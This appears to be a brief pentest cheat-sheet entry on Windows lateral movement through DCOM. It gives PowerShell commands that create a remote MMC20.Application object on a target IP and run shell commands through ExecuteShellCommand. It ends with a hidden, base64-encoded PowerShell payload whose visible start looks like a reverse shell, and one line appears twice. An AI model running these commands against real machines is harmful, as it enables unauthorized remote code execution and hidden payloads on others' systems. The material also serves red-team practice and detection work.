DCOM

The user must be a local admin

Set the dcom variable instantiating a remote MMC 2.0 application on the target

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.50"))

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.50"))

Pass the variable into the ExecuteShellCommand method

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

With an actual payload

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4A","7")